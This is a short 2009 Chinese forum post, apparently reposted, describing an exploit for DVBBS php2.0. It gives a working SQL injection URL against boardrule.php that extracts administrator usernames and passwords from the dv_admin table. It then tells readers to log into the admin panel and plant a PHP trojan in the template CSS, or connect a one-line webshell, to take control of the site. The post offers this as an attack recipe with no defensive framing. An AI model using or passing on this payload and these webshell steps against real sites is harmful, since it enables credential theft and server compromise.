fuchou-angle 发表于 2009-8-10 07:47:56

DVBBS php2.0 topicother.php 漏洞

摘自:lost.cq.cn
boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/

admin/index.php

进入后台即可了..
模板CSS里添加上php木马,或者用一句话木马连接即可拿到webshell了..
页: [1]
查看完整版本: DVBBS php2.0 topicother.php 漏洞